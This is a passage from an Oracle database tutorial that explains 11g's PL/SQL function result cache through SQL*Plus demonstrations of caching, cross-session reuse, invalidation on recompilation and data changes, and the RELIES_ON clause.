pl/sql function result cache in 11g

From http://www.oracle-developer.net/display.php?id=504

PL/SQL functions enable us to modularise and encapsulate our business logic, following generalised programming best practices. However, there has always been a performance penalty of varying degrees when using our own PL/SQL functions. The biggest penalties are borne when we embed SQL lookups inside PL/SQL functions or when we simply call PL/SQL functions repeatedly from SQL. Context-switching and excessive I/O can degrade performance of even the most simple queries. There is even an overhead in calling the most simple PL/SQL-only functions from within PL/SQL.

Oracle developers have tended to address this performance issue in different ways:

  • avoidance: hard-code business logic repeatedly in SQL statements;
  • avoidance: join to lookup tables in SQL statements;
  • optimisation: cache lookup tables in user-managed PL/SQL arrays and expose them via a function;
  • acceptance: pay the price for following good programming practice.

Oracle 11g attempts to address the cost of calling PL/SQL functions in two key ways. For the most marginal gains, there is subprogram inlining which removes the overhead of function calls by re-organising the source code during compilation. For potentially greater and more widespread gains, Oracle has introduced the Cross-Session PL/SQL Function Result Cache (to give it its full name) and we will see how this feature works in this article.

Note that for the remainder of this article, we will refer to the Cross-Session PL/SQL Function Result Cache as the “Function Result Cache”.

an overview

The principle behind PL/SQL function result caching is simple. We specify (through syntax) that a PL/SQL function is to be cached; or rather, its results are to be cached. Each time we call the function with a new set of parameters, Oracle executes the function, adds the results to the result cache and returns the result(s) to us. When we repeat the function call, Oracle retrieves the results from the cache rather than re-execute the function. Under certain circumstances, this caching behaviour can result in significant performance gains.

Many developers will recognise this behaviour as being similar to “DIY-caching” using associative arrays (formerly known as “PL/SQL Tables”). It is quite common for developers to cache lookup tables in integer or string-indexed PL/SQL arrays. The Function Result Cache differs from this technique in two important ways:

  • memory usage: associative array data is held in PGA memory. This means that cached results are available to a single session and cannot be shared. Memory usage can sometimes increase to unacceptable levels as more sessions initialise and use associative array caches. The new Function Result Cache, however, uses a global memory allocation from the shared pool (managed by Oracle) and the cached results are available across sessions;
  • cache invalidation: cached reference data is dependant on its underlying data sources. It is difficult to maintain data invalidations when using associative array caches, despite attempts by Oracle to expose notification technologies in recent versions. With the Function Result Cache, however, cached results can be directly coupled to their underlying data sources. This means that cached results are invalidated and regenerated when transactions occur against the underlying data. This protects the application from using potentially stale reference data.

recommended background reading

The Function Result Cache is one of three caching initiatives added to 11g; the others being the Query Result Cache and client-side OCI caching. The Function Result Cache and Query Result Cache share the same components (such as memory allocation and parameters). For this reason,this article on the Query Result Cache is recommended background reading. It includes details of many of the shared components, the result cache architecture, how it is allocated and managed, what it contains and how to investigate it. This information is not repeated below.

setup

For the investigations in this article, the result_cache_max_size is set to 25M. All other parameters are set to default (details of which are in the recommended reading). All examples are created in the SH supplied schema.

creating a result cache function

We will begin by creating a simple cache-enabled PL/SQL function. We will base this on a Steven Feuerstein best-practice example and create a function to encapsulate the business rule for formatting a full customer name, as follows.

SQL> CREATE FUNCTION format_customer_name (
  2                  p_first_name IN VARCHAR2,
  3                  p_last_name  IN VARCHAR2
  4                  ) RETURN VARCHAR2 RESULT_CACHE IS
  5  BEGIN
  6     counter.increment();
  7     RETURN p_first_name || ' ' || p_last_name;
  8  END format_customer_name;
  9  /

Function created.

Note the RESULT_CACHE syntax. This is new to 11g and indicates that we want the results of this function to be cached for each unique combination of the parameters. This is the minimum syntax required to make use of the new Function Result Cache.

In terms of the function we have created, it is standalone for demonstration purposes only (we would use a package for “real” application code). In addition, we have included a call to a COUNTER package. We will use this throughout this article to keep a count of how many times our function is executed.

using a result cache function

We are ready to test our cache-enabled function. As stated, we are going to keep track of how many times this is executed, so we will initialise a counter as follows.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

In the following SQL statement, we will call our function to format the names of a small sample of CUSTOMERS.

SQL> SELECT c.cust_id
  2  ,      format_customer_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
     43278 Benjamin Taylor
     25980 Benjamin Taylor
     47056 Benjamin Taylor
     18337 Abel Aaron
     21892 Abel Aaron
     25449 Abel Aaron
     29004 Abel Aaron
     32559 Abel Aaron
     37004 Abel Embrey
     40559 Abel Embrey

10 rows selected.

To complete this simple example, we will see how many times the function was executed by printing the current counter, as follows.

SQL> exec counter.show('Function calls');

Function calls: 3

PL/SQL procedure successfully completed.

The counter was incremented just three times, which suggests that the result cache was used for the remainder of the rows in our query. We can verify this anecdotally by examining our query output above. We have just three customer names in our output; although these account for ten rows between them. On the first instance of each of the customer names, Oracle executed the FORMAT_CUSTOMER_NAME function and added the return value to the result cache. On subsequent instances of the customer name parameters, Oracle retrieved the formatted customer name directly from the result cache without executing the function at all.

result cache metadata

The recommended background reading describes a range of dynamic information available about the result cache. We can use some of this information to validate our assumptions about the Function Result Cache behaviour that we observed above. The V$RESULT_CACHE_STATISTICS view keeps an instance-wide record of result cache usage, which we can query as follows.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                          VALUE
---------------------------------------- ----------
Create Count Success                              3
Find Count                                        7

2 rows selected.

Given that we started with a flushed (empty) result cache, these statistics state that we have made three entries to the result cache so far and have used these results a further seven times. This tallies exactly with what we surmised above.

We know from the background reading that the V$RESULT_CACHE_OBJECTS view exposes the cached queries and their dependencies. PL/SQL functions with result cache entries are also exposed by this view. We will query a small number of columns from this “wide” view as follows.

SQL> SELECT id
  2  ,      name
  3  ,      type
  4  ,      row_count
  5  FROM   v$result_cache_objects
  6  ORDER  BY
  7         creation_timestamp;

   ID NAME                                TYPE        ROW_COUNT
----- ----------------------------------- ---------- ----------
    0 SH.FORMAT_CUSTOMER_NAME             Dependency          0

    1 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result              1
      MAT_CUSTOMER_NAME"#940041919019bd46
       #1

    2 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result              1
      MAT_CUSTOMER_NAME"#940041919019bd46
       #1

    3 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result              1
      MAT_CUSTOMER_NAME"#940041919019bd46
       #1

4 rows selected.

Similar to the Query Result Cache objects, this view shows our function result dependencies and separate entries for each set of results. The NAME column is constructed slightly differently to that of the Query Result Cache and we can see the source function name as a dependency. We have three resultsets in the cache for FORMAT_CUSTOMER_NAME, each relating to a given combination of customer first and last name parameters. These cache entries share the same CACHE_ID (they are the same function call) but each have a different CACHE_KEY value to identify a unique invocation of the function (i.e. representing a unique set of parameter values).

pl/sql result cache and explain plan

Note that the use of the Function Result Cache will not appear in execution plans (unlike the Query Result Cache). In the following example, we will explain our previous query.

SQL> EXPLAIN PLAN SET STATEMENT_ID = 'PLSQL_CACHE'
  2  FOR
  3     SELECT c.cust_id
  4     ,      format_customer_name(
  5               c.cust_first_name, c.cust_last_name
  6               ) AS cust_name
  7     FROM   customers c;

Explained.

SQL> SELECT *
  2  FROM   TABLE(DBMS_XPLAN.DISPLAY(null,'PLSQL_CACHE'));

PLAN_TABLE_OUTPUT
-------------------------------------------------------------------------------
Plan hash value: 2008213504

-------------------------------------------------------------------------------
| Id  | Operation         | Name      | Rows  | Bytes | Cost (%CPU)| Time     |
-------------------------------------------------------------------------------
|   0 | SELECT STATEMENT  |           | 55500 |  1083K|   405   (1)| 00:00:05 |
|   1 |  TABLE ACCESS FULL| CUSTOMERS | 55500 |  1083K|   405   (1)| 00:00:05 |
-------------------------------------------------------------------------------

8 rows selected.

We have no indication that the Function Result Cache is being used for this query. This is probably to be expected, as the caching directive is in the PL/SQL source. When using the Query Result Cache, however, the CBO is aware of this status and can factor it into its arithmetic and costing mechanisms.

cross-session availability

Remember that one of the key features of the Function Result Cache is that the results are available across sessions. This distinguishes it from our own array-based caching mechanisms. We can demonstrate this behaviour quite simply. In the following example, we will connect to a new session, repeat our original query and examine our counter and the cache statistics. We will begin by starting a new session, initialising our counter and executing the query, as follows.

SQL> conn sh

Enter password:
Connected.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT c.cust_id
  2  ,      format_customer_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
     43278 Benjamin Taylor
     25980 Benjamin Taylor
     47056 Benjamin Taylor
     18337 Abel Aaron
     21892 Abel Aaron
     25449 Abel Aaron
     29004 Abel Aaron
     32559 Abel Aaron
     37004 Abel Embrey
     40559 Abel Embrey

10 rows selected.

Oracle has returned the same rows as before. This means that we should expect a 100% cache hit, despite being in a different session to the one that cached the function results. We will verify this with our counter and the result cache statistics as follows.

SQL> exec counter.show('Function calls');

Function calls: 0

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   3
Find Count 17

2 rows selected.

As expected, there were no function executions for this query and the Find Count has incremented by ten, meaning that all results were satisfied by the result cache.

result cache dependencies and protecting cache integrity

Earlier in the article we looked at V$RESULT_CACHE_OBJECTS. In this view we saw the FORMAT_CUSTOMER_NAME function listed as a dependency on itself (V$RESULT_CACHE_OBJECTS.TYPE = ‘Dependency’). In addition to this, we have the V$RESULT_CACHE_DEPENDENCY view, described in the background reading.

In our examples so far, we have ignored dependencies, but these are critical to the quality of the results that we retrieve from the cache. There are two ways that Oracle maintains dependencies for the Function Result Cache. Under certain conditions these dependencies will cause a function’s set of cached results to be invalidated and we will examine how below.

function recompilation

The first way that Oracle protects the integrity of the cached results is to invalidate them whenever the source function is recompiled. To demonstrate this, we will recompile the FORMAT_CUSTOMER_NAME function and repeat our standard cache tests. We will begin, however, by repeating our standard customer query to check on current cache hits, as follows.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT c.cust_id
  2  ,      format_customer_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
     43278 Benjamin Taylor
     25980 Benjamin Taylor
     47056 Benjamin Taylor
     18337 Abel Aaron
     21892 Abel Aaron
     25449 Abel Aaron
     29004 Abel Aaron
     32559 Abel Aaron
     37004 Abel Embrey
     40559 Abel Embrey

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 0

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   3
Find Count                                            27

2 rows selected.

The output tells us that our current results are still valid and we used the cache for every row. We will now recompile the FORMAT_CUSTOMER_NAME function and repeat the query, as follows.

SQL> ALTER FUNCTION format_customer_name COMPILE;

Function altered.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT c.cust_id
  2  ,      format_customer_name(
  3            c.cust_first_name, c.cust_last_name
  4            ) AS cust_name
  5  FROM   customers c
  6  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
     43278 Benjamin Taylor
     25980 Benjamin Taylor
     47056 Benjamin Taylor
     18337 Abel Aaron
     21892 Abel Aaron
     25449 Abel Aaron
     29004 Abel Aaron
     32559 Abel Aaron
     37004 Abel Embrey
     40559 Abel Embrey

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 3

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success 6
Find Count                                            34

2 rows selected.

The recompilation of FORMAT_CUSTOMER_NAME invalidated our results and Oracle had to re-execute the function three times to reload the cache, as we can see in the above output. The V$RESULT_CACHE_OBJECTS view gives us more information, as follows.

SQL> SELECT id
  2  ,      name
  3  ,      type
  4  ,      status
  5  ,      invalidations
  6  FROM   v$result_cache_objects
  7  ORDER  BY
  8         id;

        ID NAME                                TYPE       STATUS    INVALIDATIONS
---------- ----------------------------------- ---------- --------- -------------
         0 SH.FORMAT_CUSTOMER_NAME             Dependency Published             1

         1 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Invalid               0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

         2 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Invalid               0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

         3 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Invalid               0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

         4 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Published             0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

         5 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Published             0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

         6 "SH"."FORMAT_CUSTOMER_NAME"::8."FOR Result     Published             0
           MAT_CUSTOMER_NAME"#940041919019bd46
            #1

7 rows selected.

Interestingly, the invalidation count is marked against the dependency and not the results, although the STATUS column clearly highlights the invalid results. Following an invalidation, Oracle loads new entries into the result cache, rather than refresh the existing entries, as we can see above. The cache is managed with something similar to an LRU algorithm, so the invalid results will be aged out to make room for new entries as required.

data dependencies

In addition to the DDL dependency above, there are also data dependencies for the Function Result Cache. Many PL/SQL functions query their program data from underlying tables, so when these tables change, so might the function results.

For example, suppose a function returns a value of ‘X’ from the cache. An update to a table used by this function means that it should now return ‘Y’. The cached result for this function is now stale (i.e. it now returns a different answer to the function), but without dependencies in place, Oracle would continue to return ‘X’ (unless something caused the result to be reloaded, of course).

The way that Oracle enforces data dependencies for the Function Result Cache differs between 11g Release 1 and 11g Release 2. We will examine both below.

the relies_on clause in 11g release 1

In 11g Release 1, Oracle provides the RELIES_ON clause for us to declare a function’s dependency on one or more underlying tables or views. If any of the underlying tables are involved in a transaction (committed or uncommitted), the function’s cached results will be immediately invalidated. While the transaction is uncommitted, Oracle will continually execute the function to get the results. Once the transaction has been committed, Oracle will revert to the result caching behaviour we have seen so far.

To demonstrate the RELIES_ON clause, we will slightly modify our FORMAT_CUSTOMER_NAME function to query the customer names from the database (rather than receive them as parameters). This will make the function dependant on the CUSTOMERS table data. We will include the CUSTOMERS table name in the RELIES_ON clause, as follows.

SQL> CREATE OR REPLACE FUNCTION format_customer_name (
  2                             p_cust_id IN customers.cust_id%TYPE
  3                             ) RETURN VARCHAR2
  4                               RESULT_CACHE
  5                               RELIES_ON (customers) IS
  6
  7     v_name VARCHAR2(4000);
  8
  9  BEGIN
 10
 11     counter.increment();
 12
 13     SELECT cust_first_name || ' ' || cust_last_name
 14     INTO   v_name
 15     FROM   customers
 16     WHERE  cust_id = p_cust_id;
 17
 18     RETURN v_name;
 19
 20  END format_customer_name;
 21  /

Function created.

In using this clause, we have told Oracle that any transactions against CUSTOMERS should invalidate the cached results for the FORMAT_CUSTOMER_NAME function. We will demonstrate this by executing a “no-change” update to the CUSTOMERS table and examining the effect on the result cache. As with our previous examples, we will maintain a counter throughout. We will begin by executing a sample query on the SALES table, using our function to return the customer names, as follows.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

By coincidence, the first ten SALES rows that Oracle has returned happen to be for the same customer. From what we know of the Function Result Cache, we should expect a single cache load for these results (followed by nine cache hits). We will verify this below.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   7
Find Count                                            43

2 rows selected.

The cache usage is as predicted. The Create Count Success and Find Count have incremented by one and nine, respectively. We will now execute a “no change” update to an unrelated column in the CUSTOMERS table, as follows.

SQL> UPDATE customers
  2  SET    cust_eff_from = cust_eff_from;

55500 rows updated.

We have not committed this transaction yet, but we will repeat our example query and examine the effects on the result cache.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 10

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   7
Find Count                                            43

2 rows selected.

While there is an uncommitted transaction against CUSTOMERS, Oracle will not use the result cache for any functions that rely on this table. We can see this clearly above: the function has been executed ten times and the result cache has not been used at all. Remember that none of the CUSTOMERS data changed and neither of the columns we use in FORMAT_CUSTOMER_NAME were involved in the update. As stated, the invalidation of the results are not context sensitive and Oracle will not attempt to understand the nature of our transactions or the depth of the dependencies.

Moving on, we will now commit the transaction and examine the effect on the result cache, as follows.

SQL> COMMIT;

Commit complete.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   8
Find Count                                            52

2 rows selected.

Once the transaction is committed, we can see that “normal service” has resumed and the result cache is used as before. The RELIES_ON mechanism is therefore designed to protect us from data modifications that have the potential to change our function results. A side-effect of this is that sometimes we might invalidate perfectly good results, as above. To complete this section, we will see what happens when the customer name data itself is updated, as follows.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT format_customer_name(2) AS cust_name FROM dual;

CUST_NAME
------------------------------
Anne Koch

1 row selected.

SQL> exec counter.show('Function calls');

Function calls: 0

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   8
Find Count                                            53

2 rows selected.

As expected, our result is already in the result cache, so we will now modify the customer’s last name, as follows.

SQL> UPDATE customers
  2  SET    cust_last_name = UPPER(cust_last_name)
  3  WHERE  cust_id = 2;

1 row updated.

Without committing the transaction, we will re-query the customer name, as follows.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT format_customer_name(2) AS cust_name FROM dual;

CUST_NAME
------------------------------
Anne KOCH

1 row selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   8
Find Count                                            53

2 rows selected.

The result cache has been bypassed completely, but we have an answer consistent with our data in the CUSTOMERS table. If we didn’t use the RELIES_ON clause, Oracle would now be returning incorrect data from the cached FORMAT_CUSTOMER_NAME function results. To complete this example, we will commit the name update and execute the lookup one more time, as follows.

SQL> COMMIT;

Commit complete.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT format_customer_name(2) AS cust_name FROM dual;

CUST_NAME
------------------------------
Anne KOCH

1 row selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                               VALUE
---------------------------------------- ---------------
Create Count Success                                   9
Find Count                                            53

2 rows selected.

Once the transaction is committed, we return to using the result cache. We have reloaded the cache with the result of our single function call, which we can see in the statistics above.

data dependencies in 11g release 2: relies_on clause deprecated

In 11g Release 2, the RELIES_ON clause is deprecated (the RELIES_ON syntax is still valid but Oracle will ignore it). Instead, Oracle manages all data dependencies internally, so we do not need to declare any dependencies between a function and its underlying source data. To demonstrate this, we will re-create the FORMAT_CUSTOMER_NAME function without the RELIES_ON clause on an 11g Release 2 database, as follows.

SQL> CREATE OR REPLACE FUNCTION format_customer_name (
  2                             p_cust_id IN customers.cust_id%TYPE
  3                             ) RETURN VARCHAR2
  4                               RESULT_CACHE
  5                               IS
  6
  7     v_name VARCHAR2(4000);
  8
  9  BEGIN
 10
 11     counter.increment();
 12
 13     SELECT cust_first_name || ' ' || cust_last_name
 14     INTO   v_name
 15     FROM   customers
 16     WHERE  cust_id = p_cust_id;
 17
 18     RETURN v_name;
 19
 20  END format_customer_name;
 21  /

Function created.

This function is dependant on the CUSTOMERS table for its data but we have excluded the RELIES_ON clause that would be necessary in 11g Release 1. To demonstrate that Oracle will manage the dependencies itself, we will repeat some of our previous examples below, starting with an initial query to load and use the Function Result Cache below.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                     VALUE
---------------------------------------- --------------------------
Create Count Success                     1
Find Count                               9

2 rows selected.

By coincidence, the sample resultset is the same in 11g Release 2 and, as before, we have a single cache load and nine subsequent hits. The dependency metadata for our function is as follows.

SQL> SELECT ro.id           AS result_cache_id
  2  ,      ro.name         AS result_name
  3  ,      do.object_name
  4  FROM   v$result_cache_objects    ro
  5  ,      v$result_cache_dependency rd
  6  ,      dba_objects               do
  7  WHERE  ro.id = rd.result_id
  8  AND    rd.object_no = do.object_id;

RESULT_CACHE_ID RESULT_NAME                                   OBJECT_NAME
--------------- --------------------------------------------- -------------------------
              1 "SH"."FORMAT_CUSTOMER_NAME"::8."FORMAT_CUSTOM CUSTOMERS
                ER_NAME"#762ba075453b8b0d #1

              1 "SH"."FORMAT_CUSTOMER_NAME"::8."FORMAT_CUSTOM FORMAT_CUSTOMER_NAME
                ER_NAME"#762ba075453b8b0d #1

2 rows selected.

Despite the omission of the RELIES_ON clause, Oracle has identified the dependency of these results on the CUSTOMERS table, as we can see above. An interesting feature of this dependency mechanism is the point at which Oracle discovers the dependencies between our function and the table(s) it relies on. Function Result Cache dependencies are discovered after the function has been executed (although object dependencies are still identified at compilation time).

Moving on, we’ll now update the CUSTOMERS table, leave the transaction pending and re-execute our sample query to see the effects of this dependency mechanism.

SQL> UPDATE customers
  2  SET    cust_eff_from = cust_eff_from;

55500 rows updated.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 10

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                     VALUE
---------------------------------------- --------------------------
Create Count Success                     1
Find Count                               9

2 rows selected.

As with our 11g Release 1 tests, our uncommitted transaction on CUSTOMERS means that Oracle will not use the Function Result Cache at all (demonstrated by the 10 function calls above). The difference is that in 11g Release 2, we don’t have to specify any dependencies ourselves and so Oracle protects our cache integrity at all times (in 11g Release 1, an omitted RELIES_ON clause would mean that the cache results would risk becoming stale as Oracle would not enforce cache integrity).

Finally, we will commit our outstanding transaction and re-execute our sample query, as follows.

SQL> COMMIT;

Commit complete.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                     VALUE
---------------------------------------- --------------------------
Create Count Success                     2
Find Count                               18

2 rows selected.

Once the transaction is committed, Oracle uses the cache as expected.

data dependencies in 11g release 2: dynamic sql

We noted earlier that Function Result Cache dependencies are identified when the function is first executed and not when it is compiled. For this reason, the 11g Release 2 dependency discovery will still work when we use dynamic SQL in our functions. We will demonstrate this below by re-creating our FORMAT_CUSTOMER_NAME function without any static references to the CUSTOMERS table.

SQL> CREATE OR REPLACE FUNCTION format_customer_name (
  2                             p_cust_id IN NUMBER
  3                             ) RETURN VARCHAR2
  4                               RESULT_CACHE
  5                               IS
  6
  7     v_name VARCHAR2(4000);
  8
  9  BEGIN
 10
 11     counter.increment();
 12
 13     EXECUTE IMMEDIATE
 14        q'[SELECT cust_first_name || ' ' || cust_last_name
 15           FROM   customers
 16           WHERE  cust_id = :bv_cust_id]'
 17     INTO  v_name
 18     USING p_cust_id;
 19
 20     RETURN v_name;
 21
 22  END format_customer_name;
 23  /

Function created.

We have masked our use of the CUSTOMERS table by removing the anchored type declaration for the parameter and by using dynamic SQL for the query. We therefore have no static dependencies on CUSTOMERS at this stage, which we can confirm as follows.

SQL> SELECT * FROM v$result_cache_dependency;

no rows selected

SQL> SELECT * FROM user_dependencies WHERE referenced_name = 'FORMAT_CUSTOMER_NAME';

no rows selected

We will now execute a sample query against our new function.

SQL> exec counter.initialise();

PL/SQL procedure successfully completed.

SQL> SELECT s.cust_id
  2  ,      format_customer_name(s.cust_id) AS cust_name
  3  FROM   sales s
  4  WHERE  ROWNUM <= 10;

   CUST_ID CUST_NAME
---------- ------------------------------
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch
         2 Anne Koch

10 rows selected.

SQL> exec counter.show('Function calls');

Function calls: 1

PL/SQL procedure successfully completed.

SQL> SELECT name, value
  2  FROM   v$result_cache_statistics
  3  WHERE  name IN ('Create Count Success','Find Count');

NAME                                     VALUE
---------------------------------------- ------------------------------
Create Count Success                     1
Find Count                               9

2 rows selected.

As usual, the function is executed once to load the cache and we have nine subsequent cache hits. We will check the dependencies metadata for our function’s results as follows.

SQL> SELECT ro.id           AS result_cache_id
  2  ,      ro.name         AS result_name
  3  ,      do.object_name
  4  FROM   v$result_cache_objects    ro
  5  ,      v$result_cache_dependency rd
  6  ,      dba_objects               do
  7  WHERE  ro.id = rd.result_id
  8  AND    rd.object_no = do.object_id;

RESULT_CACHE_ID RESULT_NAME                                   OBJECT_NAME
--------------- --------------------------------------------- --------------------------
              1 "SH"."FORMAT_CUSTOMER_NAME"::8."FORMAT_CUSTOM CUSTOMERS
                ER_NAME"#762ba075453b8b0d #1

              1 "SH"."FORMAT_CUSTOMER_NAME"::8."FORMAT_CUSTOM FORMAT_CUSTOMER_NAME
                ER_NAME"#762ba075453b8b0d #1

2 rows selected.

Despite our use of dynamic SQL and the omission of the RELIES_ON clause, Oracle has identified the results’ dependency on the CUSTOMERS table, as we can see above. This means, of course, that the integrity of the function’s results is protected in the same way that we saw in our earlier examples of static dependencies.

result cache functions in packages

The examples so far have been as standalone functions, but we tend to use packages in the applications we write. There is an interesting restriction with package specifications that is worth mentioning here. First, we will create a package specification with a function without a RELIES_ON clause, as follows.

SQL> CREATE PACKAGE package_name AS
  2
  3     FUNCTION result_cache_function (
  4              p_lookup IN INTEGER
  5              ) RETURN VARCHAR2
  6                RESULT_CACHE;
  7
  8  END package_name;
  9  /

Package created.

There are no surprises here, but if we try to include the RELIES_ON clause, we see something different as follows.

SQL> CREATE OR REPLACE PACKAGE package_name AS
  2
  3     FUNCTION result_cache_function (
  4              p_lookup IN INTEGER
  5              ) RETURN VARCHAR2
  6                RESULT_CACHE
  7                RELIES_ON (products);
  8
  9  END package_name;
 10  /

Warning: Package created with compilation errors.

SQL> sho err package package_name

Errors for PACKAGE PACKAGE_NAME:

LINE/COL ERROR
-------- -----------------------------------------------------------------
3/4      PL/SQL: Declaration ignored
3/13 PLS-00999: implementation restriction (may be temporary) RELIES_ON clause is disallowed on function declaration

We cannot specify the RELIES_ON clause in the function specification. It is declared the package body only.

result cache performance investigations

